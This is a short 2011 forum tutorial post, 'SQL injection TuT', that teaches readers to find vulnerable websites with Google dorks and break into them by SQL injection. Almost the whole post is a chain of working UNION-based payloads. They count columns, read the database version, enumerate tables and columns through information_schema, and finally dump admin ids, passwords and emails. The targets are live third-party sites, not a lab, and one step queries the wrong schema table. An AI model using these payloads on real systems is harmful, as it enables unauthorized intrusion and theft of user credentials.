Admin Admin
Posts : 6 Join date : 2011-11-06
| Subject: SQL injection TuT Sun Nov 06, 2011 5:57 pm | |
| Okay I am going to be teaching you how to SQL Inject. You can find a vurnable sites by searching on google. - Quote :
- index.php?id=1
You can find more if you search google sql dork. okay now that you have you vurnable site now put a ' after the number like this. - Quote :
- http://examplesite.com/index.php?id=1'
And Errors should put up if it do not its not vurnable. Now we and going to find out how many columns are in the database put "order by 1--" until you see and error like this - Quote :
- http://examplesitec.com/index.php?id=1 order by 1--
Now that you have all the columns put "UNION SELECT" than the number of columns like this. - Quote :
- http://examplesite.com/index.php?id=-1 UNION SELECT 1,2,3,4,5,6,7,8,9--
Now you can see the vurnable colums you can change. So my we need the verson so if 5 is vurnable - Quote :
- http://examplesite.com/index.php?id=-1 UNION SELECT 1,2,3,4,@@version,6,7,8,9--
The version should pop up and something it will come encryption so you should get a decryter so now we are going to change @@version with " group_concat(table_name)" and change "--" with "+from+information_schema.tables+where+table_schema=database()--" the columns will have names on it like this - Quote :
- http://examplesite.com/index.php?id=-1 UNION SELECT 1,2,3,4,group_concat(table_name),6,7,8,9+from+information_schema.tables+where+table_schema=database()--
Now replace group_concat(table_name) with group_concat(column_name) - Quote :
- http://examplesite.com/index.php?id=-1 UNION SELECT 1,2,3,4, group_concat(column_name),6,7,8,9+from+information_schema.tables+where+table_schema=database()--
Now you have to replace group_concat(column_name) with group_concat(id,0x3a,pass,0x3a,mail) and replace +from+information_schema.tables+where+table_schema=database() with +from+x_admins - Quote :
- http://examplesite.com/index.php?id=-1 UNION SELECT 1,2,3,4, group_concat(id,0x3a,pass,0x3a,mail),6,7,8,9+from+x_admins--
You had just SQL injected a site. | |
|